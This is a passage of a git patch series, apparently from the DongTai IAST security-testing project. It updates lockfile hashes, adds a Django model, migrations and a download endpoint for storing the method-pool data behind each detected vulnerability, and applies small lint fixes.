"sha256:542a757e2a6ec409e71df3d8fd20127afbbacb1c07990cb23c5870c13953d899", + "sha256:8d9886f44ef8c9e776cb7527fb01455bf4f4a46c455c4682edc2c2cc8cd78562", + "sha256:90d3b1364e751d8214e325c371f0ee0dd38419268bf4888b2ae1040a6b266b2a", + "sha256:95763fbda1206bec41157582bea482f50eb3702c85fffcf6d24394b071c0e87a", + "sha256:ac74b1512d38718fb6a491c439aa7b3605b96b1ed3be6599c17d49d6c60fca18", + "sha256:afdb0d983f6135d50770dd979df50bf1c7f58b5b33e0eb8cf5c73c70600eae1d", + "sha256:b0620240ef445b5ddde52460e6bc3483b7c9c750275369379e5f609a1050911c", + "sha256:b133f237bd8ba73bad51bc12eb4f2d84cbec999753bf25ba58235e9fc2096d80", + "sha256:b29318a5e39bd200ca4381d80b065cdf3076c7d7281c5e36569e99273867f61d", + "sha256:b8425fa963a32936c9773ee3ce44a765d8ff67eed5f4ac81dc1e4a819a238ee9", + "sha256:d2b813bfbe8dec6a75164523de650bad41f4405d35b0fa24c2c28ae07fcefb20", + "sha256:d690e1ca993c8f7ede6d22e5637541217fc6a4d3f78b3672a6fe454dbb7eb9a7", + "sha256:e367904a0fec76433bf3fbf3e85bf60dae8e9e585ffd21898ab1085a29a04d16", + "sha256:ea932570b1c2a30edafca922345854ff2cd20d43cd9123b6dacfdecebfc1a80b", + "sha256:f28f1f6cfeb48339c192efc6275749b2a25a7e49c4d8369a28b6591da02fbc9a", + "sha256:f73102f769ee06041a3aa26b5841359b1a93cc364ce45609657751795e8f4a4a", + "sha256:fa4909c6c20c3d91480533cddbc0e7c6d849e7d9ded692918c76ce5964997898" ], "markers": "python_version < '3.13' and python_version >= '3.9'", - "version": "==1.11.1" + "version": "==1.11.2" }, "setuptools": { "hashes": [ @@ -1880,7 +1891,7 @@ "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc", "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f" ], - "markers": "python_version >= '3.7'", + "markers": "python_version < '3.11'", "version": "==2.0.1" }, "tornado": { @@ -1905,7 +1916,7 @@ "sha256:0e31d7ba44e1898af37d224b94d28ffaef19baf89bb18ea2599de9ac0910a07f", "sha256:eaef60422cf716b4ae216f164b74d679c82b0d9c53db380a37deb29ae5579b1b" ], - "markers": "python_version >= '3.7' and python_version < '4.0'", + "markers": "python_version >= '3.7' and python_version < '4'", "version": "==0.19.0" }, "types-pymysql": { @@ -1967,7 +1978,7 @@ "sha256:1068877b6e59be5226fa3006ae64371ac9d5bc590dfdbd9c66fd0a075d3254ac", "sha256:4ba9b483796fdcd026aa162ee03bdcedd2bf7d08e9387c820dcdd158b0102057" ], - "markers": "python_version >= '3.7' and python_version < '4.0'", + "markers": "python_version >= '3.7' and python_version < '4'", "version": "==0.6.2" }, "types-urllib3": { @@ -2019,10 +2030,10 @@ }, "uwsgi": { "hashes": [ - "sha256:35a30d83791329429bc04fe44183ce4ab512fcf6968070a7bfba42fc5a0552a9" + "sha256:4cc4727258671ac5fa17ab422155e9aaef8a2008ebb86e4404b66deaae965db2" ], "index": "pypi", - "version": "==2.0.21" + "version": "==2.0.22" }, "uwsgitop": { "hashes": [ From a0c11873a601a1c0ad048ee9975f5cb76a1402dc Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 25 Aug 2023 16:14:43 +0800 Subject: [PATCH 018/114] feat: method pool save --- .../migrations/0014_auto_20230825_1507.py | 61 +++++++++++++++++++ dongtai_common/models/agent_method_pool.py | 30 +++++++++ .../signals/handlers/vul_handler.py | 25 +++++++- dongtai_web/urls.py | 2 + dongtai_web/views/vul_delete.py | 2 + dongtai_web/views/vul_method_pool_download.py | 57 +++++++++++++++++ 6 files changed, 176 insertions(+), 1 deletion(-) create mode 100644 dongtai_common/migrations/0014_auto_20230825_1507.py create mode 100644 dongtai_web/views/vul_method_pool_download.py diff --git a/dongtai_common/migrations/0014_auto_20230825_1507.py b/dongtai_common/migrations/0014_auto_20230825_1507.py new file mode 100644 index 000000000..61b85a3c6 --- /dev/null +++ b/dongtai_common/migrations/0014_auto_20230825_1507.py @@ -0,0 +1,61 @@ +# Generated by Django 3.2.20 on 2023-08-25 15:07 + +from django.db import migrations, models +import django.db.models.deletion + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0013_auto_20230822_1202"), + ] + + operations = [ + migrations.CreateModel( + name="VulMethodPool", + fields=[ + ("id", models.BigAutoField(primary_key=True, serialize=False)), + ("url", models.CharField(blank=True, max_length=2000)), + ("uri", models.CharField(blank=True, max_length=2000)), + ("http_method", models.CharField(blank=True, max_length=10)), + ("http_scheme", models.CharField(blank=True, max_length=20)), + ("http_protocol", models.CharField(blank=True, max_length=255)), + ("req_header", models.CharField(blank=True, max_length=2000, null=True)), + ("req_params", models.CharField(blank=True, max_length=2000, null=True)), + ("req_data", models.CharField(blank=True, max_length=4000, null=True)), + ("res_header", models.CharField(blank=True, max_length=1000, null=True)), + ("res_body", models.TextField(blank=True, null=True)), + ("req_header_fs", models.TextField(db_column="req_header_for_search")), + ("context_path", models.CharField(blank=True, max_length=255, null=True)), + ("method_pool", models.TextField()), + ("pool_sign", models.CharField(blank=True, max_length=40, unique=True)), + ("clent_ip", models.CharField(blank=True, max_length=255)), + ("create_time", models.IntegerField()), + ("update_time", models.IntegerField()), + ("uri_sha1", models.CharField(blank=True, db_index=True, max_length=40)), + ( + "agent", + models.ForeignKey( + db_constraint=False, + on_delete=django.db.models.deletion.DO_NOTHING, + to="dongtai_common.iastagent", + ), + ), + ( + "vul", + models.ForeignKey( + db_constraint=False, + on_delete=django.db.models.deletion.DO_NOTHING, + to="dongtai_common.iastvulnerabilitymodel", + ), + ), + ], + options={ + "db_table": "iast_agent_method_pool_vul", + "managed": True, + }, + ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["uri_sha1", "http_method", "agent"], name="iast_agent__uri_sha_c94d8d_idx"), + ), + ] diff --git a/dongtai_common/models/agent_method_pool.py b/dongtai_common/models/agent_method_pool.py index bcb7a7763..764eb91fa 100644 --- a/dongtai_common/models/agent_method_pool.py +++ b/dongtai_common/models/agent_method_pool.py @@ -7,6 +7,7 @@ from dongtai_common.models.agent import IastAgent from dongtai_common.models.hook_strategy import HookStrategy +from dongtai_common.models.vulnerablity import IastVulnerabilityModel from dongtai_common.utils.settings import get_managed from dongtai_conf.settings import METHOD_POOL_INDEX @@ -48,6 +49,35 @@ class Meta: indexes = [models.Index(fields=["uri_sha1", "http_method", "agent"])] +class VulMethodPool(models.Model): + id = models.BigAutoField(primary_key=True) + agent = models.ForeignKey(IastAgent, models.DO_NOTHING, db_constraint=False) + url = models.CharField(max_length=2000, blank=True) + uri = models.CharField(max_length=2000, blank=True) + http_method = models.CharField(max_length=10, blank=True) + http_scheme = models.CharField(max_length=20, blank=True) + http_protocol = models.CharField(max_length=255, blank=True) + req_header = models.CharField(max_length=2000, blank=True, null=True) + req_params = models.CharField(max_length=2000, blank=True, null=True) + req_data = models.CharField(max_length=4000, blank=True, null=True) + res_header = models.CharField(max_length=1000, blank=True, null=True) + res_body = models.TextField(blank=True, null=True) + req_header_fs = models.TextField(db_column="req_header_for_search") + context_path = models.CharField(max_length=255, blank=True, null=True) + method_pool = models.TextField() # This field type is a guess. + pool_sign = models.CharField(unique=True, blank=True, max_length=40) # This field type is a guess. + clent_ip = models.CharField(max_length=255, blank=True) + create_time = models.IntegerField() + update_time = models.IntegerField() + uri_sha1 = models.CharField(max_length=40, blank=True, db_index=True) + vul = models.ForeignKey(IastVulnerabilityModel, models.DO_NOTHING, db_constraint=False) + + class Meta: + managed = get_managed() + db_table = "iast_agent_method_pool_vul" + indexes = [models.Index(fields=["uri_sha1", "http_method", "agent"])] + + @registry.register_document class MethodPoolDocument(Document): user_id = fields.IntegerField(attr="agent.user_id") diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index c950e1789..f2a6cd027 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -13,7 +13,7 @@ from django.dispatch import receiver from dongtai_common.engine.compatibility import method_pool_3_to_2 -from dongtai_common.models.agent_method_pool import MethodPool +from dongtai_common.models.agent_method_pool import MethodPool, VulMethodPool from dongtai_common.models.profile import IastProfile from dongtai_common.models.project import IastProject, VulValidation from dongtai_common.models.replay_queue import IastReplayQueue @@ -374,6 +374,29 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac department_id=vul_meta.agent.department_id, ) + VulMethodPool( + id=vul_meta.id, + agent_id=vul_meta.agent_id, + url=vul_meta.url, + uri=vul_meta.uri, + http_method=vul_meta.http_method, + http_scheme=vul_meta.http_scheme, + http_protocol=vul_meta.http_protocol, + req_header=vul_meta.req_header, + req_params=vul_meta.req_params, + req_data=vul_meta.req_data, + res_header=vul_meta.res_header, + res_body=vul_meta.res_body, + req_header_fs=vul_meta.req_header_fs, + context_path=vul_meta.context_path, + method_pool=vul_meta.method_pool, + pool_sign=vul_meta.pool_sign, + clent_ip=vul_meta.clent_ip, + create_time=vul_meta.create_time, + update_time=vul_meta.update_time, + uri_sha1=vul_meta.uri_sha1, + vul_id=1, + ).save() cache.delete(cache_key) # delete if exists more than one departured use redis lock # IastVulnerabilityModel.objects.filter( diff --git a/dongtai_web/urls.py b/dongtai_web/urls.py index 03b7cde43..f26be3947 100644 --- a/dongtai_web/urls.py +++ b/dongtai_web/urls.py @@ -114,6 +114,7 @@ ) from dongtai_web.views.vul_levels import VulLevelList from dongtai_web.views.vul_list_for_plugin import VulListEndPoint +from dongtai_web.views.vul_method_pool_download import VulMethodPoolDownload from dongtai_web.views.vul_request_replay import RequestReplayEndPoint from dongtai_web.views.vul_status import VulStatus from dongtai_web.views.vul_summary import VulSummary @@ -156,6 +157,7 @@ path("vuln/", VulDetail.as_view()), path("vuln/status", VulStatus.as_view()), path("vuln/delete/", VulDelete.as_view()), + path("vuln/method_pool/", VulMethodPoolDownload.as_view()), path("vul/status_list", VulnerabilityStatusView.as_view()), path("plugin/vuln/list", VulListEndPoint.as_view()), path("plugin/vuln/count", VulCountForPluginEndPoint.as_view()), diff --git a/dongtai_web/views/vul_delete.py b/dongtai_web/views/vul_delete.py index 5d78195d6..f3c1c8f11 100644 --- a/dongtai_web/views/vul_delete.py +++ b/dongtai_web/views/vul_delete.py @@ -4,6 +4,7 @@ from django.utils.translation import gettext_lazy as _ from dongtai_common.endpoint import R, UserEndPoint +from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.vulnerablity import IastVulnerabilityModel from dongtai_web.utils import extend_schema_with_envcheck, get_response_serializer @@ -35,6 +36,7 @@ def post(self, request, id): IastVulnerabilityModel.objects.get( id=id, agent_id__in=self.get_auth_agents_with_user(request.user) ).delete() + VulMethodPool.objects.filter(vul_id=id).delete() return R.success(msg=_("Deleted Successfully")) except IastVulnerabilityModel.DoesNotExist: return R.failure(msg=_("Failed to delete, error message: Vulnerability does not exist")) diff --git a/dongtai_web/views/vul_method_pool_download.py b/dongtai_web/views/vul_method_pool_download.py new file mode 100644 index 000000000..1e23c2530 --- /dev/null +++ b/dongtai_web/views/vul_method_pool_download.py @@ -0,0 +1,57 @@ +import logging + +from django.utils.translation import gettext_lazy as _ +from drf_spectacular.utils import extend_schema +from rest_framework import serializers + +from dongtai_common.endpoint import R, UserEndPoint +from dongtai_common.models.agent_method_pool import VulMethodPool +from dongtai_common.utils.request_type import Request + +logger = logging.getLogger("dongtai-webapi") + + +class VulMethodPoolSerializer(serializers.ModelSerializer): + class Meta: + model = VulMethodPool + fields = [ + "id", + "agent_id", + "url", + "uri", + "http_method", + "http_scheme", + "http_protocol", + "req_header", + "req_params", + "req_data", + "res_header", + "res_body", + "req_header_fs", + "context_path", + "method_pool", + "pool_sign", + "clent_ip", + "create_time", + "update_time", + "uri_sha1", + "vul_id", + ] + + +class VulMethodPoolDownload(UserEndPoint): + @extend_schema( + summary=_("Vulnerability Method Pool Download"), + tags=[_("Vulnerability")], + description=_("Get the raw method pool of the corresponding vulnerability by specifying the id"), + ) + def get(self, request: Request, id: int): + try: + return R.success( + data=VulMethodPoolSerializer( + VulMethodPool.objects.filter(vul_id=id).order_by("-update_time").first() + ).data + ) + except Exception as e: + logger.exception("operation failed", exc_info=e) + return R.failure(data="operation failed") From 7af4ebed2ef496273677a8d437b36b6af1b9f4e2 Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 25 Aug 2023 16:17:13 +0800 Subject: [PATCH 019/114] feat: method pool save --- dongtai_common/migrations/0014_auto_20230825_1507.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_common/migrations/0014_auto_20230825_1507.py b/dongtai_common/migrations/0014_auto_20230825_1507.py index 61b85a3c6..86e58d3a5 100644 --- a/dongtai_common/migrations/0014_auto_20230825_1507.py +++ b/dongtai_common/migrations/0014_auto_20230825_1507.py @@ -1,7 +1,7 @@ # Generated by Django 3.2.20 on 2023-08-25 15:07 -from django.db import migrations, models import django.db.models.deletion +from django.db import migrations, models class Migration(migrations.Migration): From 129113a2022d88b0c5c730fcb7edaa782af21c5a Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 25 Aug 2023 18:51:08 +0800 Subject: [PATCH 020/114] feat: method pool save --- dongtai_common/models/agent_method_pool.py | 9 +++- .../signals/handlers/vul_handler.py | 50 ++++++++++--------- dongtai_web/urls.py | 2 +- dongtai_web/views/vul_method_pool_download.py | 4 +- 4 files changed, 37 insertions(+), 28 deletions(-) diff --git a/dongtai_common/models/agent_method_pool.py b/dongtai_common/models/agent_method_pool.py index 764eb91fa..2f83d364b 100644 --- a/dongtai_common/models/agent_method_pool.py +++ b/dongtai_common/models/agent_method_pool.py @@ -51,6 +51,8 @@ class Meta: class VulMethodPool(models.Model): id = models.BigAutoField(primary_key=True) + method_pool_id = models.IntegerField() + vul = models.ForeignKey(IastVulnerabilityModel, models.DO_NOTHING, db_constraint=False) agent = models.ForeignKey(IastAgent, models.DO_NOTHING, db_constraint=False) url = models.CharField(max_length=2000, blank=True) uri = models.CharField(max_length=2000, blank=True) @@ -70,12 +72,15 @@ class VulMethodPool(models.Model): create_time = models.IntegerField() update_time = models.IntegerField() uri_sha1 = models.CharField(max_length=40, blank=True, db_index=True) - vul = models.ForeignKey(IastVulnerabilityModel, models.DO_NOTHING, db_constraint=False) class Meta: managed = get_managed() db_table = "iast_agent_method_pool_vul" - indexes = [models.Index(fields=["uri_sha1", "http_method", "agent"])] + indexes = [ + models.Index(fields=["uri_sha1", "http_method", "agent"]), + models.Index(fields=["method_pool_id"]), + models.Index(fields=["vul_id"]), + ] @registry.register_document diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index f2a6cd027..c29da3621 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -374,29 +374,33 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac department_id=vul_meta.agent.department_id, ) - VulMethodPool( - id=vul_meta.id, - agent_id=vul_meta.agent_id, - url=vul_meta.url, - uri=vul_meta.uri, - http_method=vul_meta.http_method, - http_scheme=vul_meta.http_scheme, - http_protocol=vul_meta.http_protocol, - req_header=vul_meta.req_header, - req_params=vul_meta.req_params, - req_data=vul_meta.req_data, - res_header=vul_meta.res_header, - res_body=vul_meta.res_body, - req_header_fs=vul_meta.req_header_fs, - context_path=vul_meta.context_path, - method_pool=vul_meta.method_pool, - pool_sign=vul_meta.pool_sign, - clent_ip=vul_meta.clent_ip, - create_time=vul_meta.create_time, - update_time=vul_meta.update_time, - uri_sha1=vul_meta.uri_sha1, - vul_id=1, - ).save() + VulMethodPool.objects.update_or_create( + vul_id=vul.id, + defaults={ + "method_pool_id": vul_meta.id, + "vul_id": vul.id, + "agent_id": vul_meta.agent_id, + "url": vul_meta.url, + "uri": vul_meta.uri, + "http_method": vul_meta.http_method, + "http_scheme": vul_meta.http_scheme, + "http_protocol": vul_meta.http_protocol, + "req_header": vul_meta.req_header, + "req_params": vul_meta.req_params, + "req_data": vul_meta.req_data, + "res_header": vul_meta.res_header, + "res_body": vul_meta.res_body, + "req_header_fs": vul_meta.req_header_fs, + "context_path": vul_meta.context_path, + "method_pool": vul_meta.method_pool, + "pool_sign": vul_meta.pool_sign, + "clent_ip": vul_meta.clent_ip, + "create_time": vul_meta.create_time, + "update_time": vul_meta.update_time, + "uri_sha1": vul_meta.uri_sha1, + }, + ) + cache.delete(cache_key) # delete if exists more than one departured use redis lock # IastVulnerabilityModel.objects.filter( diff --git a/dongtai_web/urls.py b/dongtai_web/urls.py index f26be3947..9799f2221 100644 --- a/dongtai_web/urls.py +++ b/dongtai_web/urls.py @@ -157,7 +157,7 @@ path("vuln/", VulDetail.as_view()), path("vuln/status", VulStatus.as_view()), path("vuln/delete/", VulDelete.as_view()), - path("vuln/method_pool/", VulMethodPoolDownload.as_view()), + path("vuln//method_pool", VulMethodPoolDownload.as_view()), path("vul/status_list", VulnerabilityStatusView.as_view()), path("plugin/vuln/list", VulListEndPoint.as_view()), path("plugin/vuln/count", VulCountForPluginEndPoint.as_view()), diff --git a/dongtai_web/views/vul_method_pool_download.py b/dongtai_web/views/vul_method_pool_download.py index 1e23c2530..2e94fa177 100644 --- a/dongtai_web/views/vul_method_pool_download.py +++ b/dongtai_web/views/vul_method_pool_download.py @@ -15,7 +15,8 @@ class VulMethodPoolSerializer(serializers.ModelSerializer): class Meta: model = VulMethodPool fields = [ - "id", + "method_pool_id", + "vul_id", "agent_id", "url", "uri", @@ -35,7 +36,6 @@ class Meta: "create_time", "update_time", "uri_sha1", - "vul_id", ] From 0045fabca4fccedc13ff540fd3f4deef8daa50a2 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 10:53:25 +0800 Subject: [PATCH 021/114] feat: method pool save --- .../migrations/0015_auto_20230828_1053.py | 39 +++++++++++++++++++ dongtai_common/models/agent_method_pool.py | 5 ++- dongtai_web/views/vul_delete.py | 2 - 3 files changed, 42 insertions(+), 4 deletions(-) create mode 100644 dongtai_common/migrations/0015_auto_20230828_1053.py diff --git a/dongtai_common/migrations/0015_auto_20230828_1053.py b/dongtai_common/migrations/0015_auto_20230828_1053.py new file mode 100644 index 000000000..8cd8bc12b --- /dev/null +++ b/dongtai_common/migrations/0015_auto_20230828_1053.py @@ -0,0 +1,39 @@ +# Generated by Django 3.2.20 on 2023-08-28 10:53 + +import django.db.models.deletion +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0014_auto_20230825_1507"), + ] + + operations = [ + migrations.AddField( + model_name="vulmethodpool", + name="method_pool_id", + field=models.IntegerField(default=0), + ), + migrations.AlterField( + model_name="vulmethodpool", + name="vul", + field=models.ForeignKey( + db_constraint=False, + on_delete=django.db.models.deletion.CASCADE, + to="dongtai_common.iastvulnerabilitymodel", + ), + ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["method_pool_id"], name="iast_agent__method__46f7b0_idx"), + ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["vul_id"], name="iast_agent__vul_id_6f1c90_idx"), + ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["update_time"], name="iast_agent__update__718d63_idx"), + ), + ] diff --git a/dongtai_common/models/agent_method_pool.py b/dongtai_common/models/agent_method_pool.py index 2f83d364b..aaaa8d0a5 100644 --- a/dongtai_common/models/agent_method_pool.py +++ b/dongtai_common/models/agent_method_pool.py @@ -51,8 +51,8 @@ class Meta: class VulMethodPool(models.Model): id = models.BigAutoField(primary_key=True) - method_pool_id = models.IntegerField() - vul = models.ForeignKey(IastVulnerabilityModel, models.DO_NOTHING, db_constraint=False) + method_pool_id = models.IntegerField(default=0) + vul = models.ForeignKey(IastVulnerabilityModel, models.CASCADE, db_constraint=False) agent = models.ForeignKey(IastAgent, models.DO_NOTHING, db_constraint=False) url = models.CharField(max_length=2000, blank=True) uri = models.CharField(max_length=2000, blank=True) @@ -80,6 +80,7 @@ class Meta: models.Index(fields=["uri_sha1", "http_method", "agent"]), models.Index(fields=["method_pool_id"]), models.Index(fields=["vul_id"]), + models.Index(fields=["update_time"]), ] diff --git a/dongtai_web/views/vul_delete.py b/dongtai_web/views/vul_delete.py index f3c1c8f11..5d78195d6 100644 --- a/dongtai_web/views/vul_delete.py +++ b/dongtai_web/views/vul_delete.py @@ -4,7 +4,6 @@ from django.utils.translation import gettext_lazy as _ from dongtai_common.endpoint import R, UserEndPoint -from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.vulnerablity import IastVulnerabilityModel from dongtai_web.utils import extend_schema_with_envcheck, get_response_serializer @@ -36,7 +35,6 @@ def post(self, request, id): IastVulnerabilityModel.objects.get( id=id, agent_id__in=self.get_auth_agents_with_user(request.user) ).delete() - VulMethodPool.objects.filter(vul_id=id).delete() return R.success(msg=_("Deleted Successfully")) except IastVulnerabilityModel.DoesNotExist: return R.failure(msg=_("Failed to delete, error message: Vulnerability does not exist")) From a8614c6bb2af852aaa6ab000c573a447d458ef89 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 11:00:55 +0800 Subject: [PATCH 022/114] feat: modify project summary api day_num field --- dongtai_web/views/utils/commonstats.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/dongtai_web/views/utils/commonstats.py b/dongtai_web/views/utils/commonstats.py index 2d49b07c1..cc83caad0 100644 --- a/dongtai_web/views/utils/commonstats.py +++ b/dongtai_web/views/utils/commonstats.py @@ -98,6 +98,7 @@ def get_summary_by_agent_ids(agent_ids: Iterable): for day_label_i in range(len(daylist)): _, day_label = daylist[day_label_i] if day_label in day_num_dict: + # show this day if this day has data obj = get_empty_day_num_num(day_label) count = 0 for i in day_num_dict[day_label]: @@ -106,6 +107,7 @@ def get_summary_by_agent_ids(agent_ids: Iterable): obj["day_num"] = count day_num_data.append(obj) elif day_label_i + 1 < len(daylist) and daylist[day_label_i + 1][1] in day_num_dict: + # show this day if this yesterday has data day_num_data.append(get_empty_day_num_num(day_label)) data["day_num"] = day_num_data levelInfo = IastVulLevel.objects.all() @@ -197,6 +199,7 @@ def get_summary_by_project(project_id: int, project_version_id: int): for day_label_i in range(len(daylist)): _, day_label = daylist[day_label_i] if day_label in day_num_dict: + # show this day if this day has data obj = get_empty_day_num_num(day_label) count = 0 for i in day_num_dict[day_label]: @@ -205,6 +208,7 @@ def get_summary_by_project(project_id: int, project_version_id: int): obj["day_num"] = count day_num_data.append(obj) elif day_label_i + 1 < len(daylist) and daylist[day_label_i + 1][1] in day_num_dict: + # show this day if this yesterday has data day_num_data.append(get_empty_day_num_num(day_label)) data["day_num"] = day_num_data levelInfo = IastVulLevel.objects.all() From 11b72b6cfffabfd98c205ae74347ceeeb9b7df99 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 11:04:34 +0800 Subject: [PATCH 023/114] feat: method pool save --- ...825_1507.py => 0014_auto_20230828_1104.py} | 17 +++++++- .../migrations/0015_auto_20230828_1053.py | 39 ------------------- 2 files changed, 15 insertions(+), 41 deletions(-) rename dongtai_common/migrations/{0014_auto_20230825_1507.py => 0014_auto_20230828_1104.py} (79%) delete mode 100644 dongtai_common/migrations/0015_auto_20230828_1053.py diff --git a/dongtai_common/migrations/0014_auto_20230825_1507.py b/dongtai_common/migrations/0014_auto_20230828_1104.py similarity index 79% rename from dongtai_common/migrations/0014_auto_20230825_1507.py rename to dongtai_common/migrations/0014_auto_20230828_1104.py index 86e58d3a5..6c1804606 100644 --- a/dongtai_common/migrations/0014_auto_20230825_1507.py +++ b/dongtai_common/migrations/0014_auto_20230828_1104.py @@ -1,4 +1,4 @@ -# Generated by Django 3.2.20 on 2023-08-25 15:07 +# Generated by Django 3.2.20 on 2023-08-28 11:04 import django.db.models.deletion from django.db import migrations, models @@ -14,6 +14,7 @@ class Migration(migrations.Migration): name="VulMethodPool", fields=[ ("id", models.BigAutoField(primary_key=True, serialize=False)), + ("method_pool_id", models.IntegerField(default=0)), ("url", models.CharField(blank=True, max_length=2000)), ("uri", models.CharField(blank=True, max_length=2000)), ("http_method", models.CharField(blank=True, max_length=10)), @@ -44,7 +45,7 @@ class Migration(migrations.Migration): "vul", models.ForeignKey( db_constraint=False, - on_delete=django.db.models.deletion.DO_NOTHING, + on_delete=django.db.models.deletion.CASCADE, to="dongtai_common.iastvulnerabilitymodel", ), ), @@ -58,4 +59,16 @@ class Migration(migrations.Migration): model_name="vulmethodpool", index=models.Index(fields=["uri_sha1", "http_method", "agent"], name="iast_agent__uri_sha_c94d8d_idx"), ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["method_pool_id"], name="iast_agent__method__46f7b0_idx"), + ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["vul_id"], name="iast_agent__vul_id_6f1c90_idx"), + ), + migrations.AddIndex( + model_name="vulmethodpool", + index=models.Index(fields=["update_time"], name="iast_agent__update__718d63_idx"), + ), ] diff --git a/dongtai_common/migrations/0015_auto_20230828_1053.py b/dongtai_common/migrations/0015_auto_20230828_1053.py deleted file mode 100644 index 8cd8bc12b..000000000 --- a/dongtai_common/migrations/0015_auto_20230828_1053.py +++ /dev/null @@ -1,39 +0,0 @@ -# Generated by Django 3.2.20 on 2023-08-28 10:53 - -import django.db.models.deletion -from django.db import migrations, models - - -class Migration(migrations.Migration): - dependencies = [ - ("dongtai_common", "0014_auto_20230825_1507"), - ] - - operations = [ - migrations.AddField( - model_name="vulmethodpool", - name="method_pool_id", - field=models.IntegerField(default=0), - ), - migrations.AlterField( - model_name="vulmethodpool", - name="vul", - field=models.ForeignKey( - db_constraint=False, - on_delete=django.db.models.deletion.CASCADE, - to="dongtai_common.iastvulnerabilitymodel", - ), - ), - migrations.AddIndex( - model_name="vulmethodpool", - index=models.Index(fields=["method_pool_id"], name="iast_agent__method__46f7b0_idx"), - ), - migrations.AddIndex( - model_name="vulmethodpool", - index=models.Index(fields=["vul_id"], name="iast_agent__vul_id_6f1c90_idx"), - ), - migrations.AddIndex( - model_name="vulmethodpool", - index=models.Index(fields=["update_time"], name="iast_agent__update__718d63_idx"), - ), - ] From 40efec3ba8534c01628d7d52b072c3775bfa2ef5 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 11:06:35 +0800 Subject: [PATCH 024/114] fix: ruff error --- dongtai_common/engine/vul_engine.py | 4 ++-- dongtai_engine/signals/handlers/vul_handler.py | 2 +- pyproject.toml | 1 - 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 9b87c6cdd..eb1a04e15 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -264,7 +264,7 @@ def vul_filter(self): # mark there has a vul # if vul_type has filter, do escape stack_count = len(self.vul_stack) - for index in range(0, stack_count): + for index in range(stack_count): stack = self.vul_stack[index] for item in stack: if item["signature"] == "java.net.URL.": @@ -278,7 +278,7 @@ def vul_filter(self): break vul_source_signature = self.vul_source_signature self.vul_source_signature = None - for index in range(0, stack_count): + for index in range(stack_count): if self.vul_stack[index]: self.vul_source_signature = vul_source_signature else: diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index c29da3621..60a43b7e8 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -95,7 +95,7 @@ def parse_header(req_header: str, taint_value: str) -> str | None: header_dict = parse_headers_dict_from_bytes(base64.b64decode(req_header)) for k, v in header_dict.items(): - if v == taint_value or k == taint_value: + if taint_value in {v, k}: return k return None diff --git a/pyproject.toml b/pyproject.toml index b7db3b821..ae0a9afeb 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -30,7 +30,6 @@ select = [ "SIM", # flake8-simplify "TCH", # flake8-type-checking "INT", # flake8-gettext - "ERA", # eradicate "PGH", # pygrep-hooks "PL", # Pylint "TRY", # tryceratops From 29bd97bd375e63b982a7af5ef7e514fcb34c8b47 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 11:38:49 +0800 Subject: [PATCH 025/114] feat: method pool save --- ...4_auto_20230828_1104.py => 0014_auto_20230828_1132.py} | 8 ++------ dongtai_common/models/agent_method_pool.py | 3 +-- 2 files changed, 3 insertions(+), 8 deletions(-) rename dongtai_common/migrations/{0014_auto_20230828_1104.py => 0014_auto_20230828_1132.py} (90%) diff --git a/dongtai_common/migrations/0014_auto_20230828_1104.py b/dongtai_common/migrations/0014_auto_20230828_1132.py similarity index 90% rename from dongtai_common/migrations/0014_auto_20230828_1104.py rename to dongtai_common/migrations/0014_auto_20230828_1132.py index 6c1804606..456c5c1e0 100644 --- a/dongtai_common/migrations/0014_auto_20230828_1104.py +++ b/dongtai_common/migrations/0014_auto_20230828_1132.py @@ -1,4 +1,4 @@ -# Generated by Django 3.2.20 on 2023-08-28 11:04 +# Generated by Django 3.2.20 on 2023-08-28 11:32 import django.db.models.deletion from django.db import migrations, models @@ -65,10 +65,6 @@ class Migration(migrations.Migration): ), migrations.AddIndex( model_name="vulmethodpool", - index=models.Index(fields=["vul_id"], name="iast_agent__vul_id_6f1c90_idx"), - ), - migrations.AddIndex( - model_name="vulmethodpool", - index=models.Index(fields=["update_time"], name="iast_agent__update__718d63_idx"), + index=models.Index(fields=["vul_id", "update_time"], 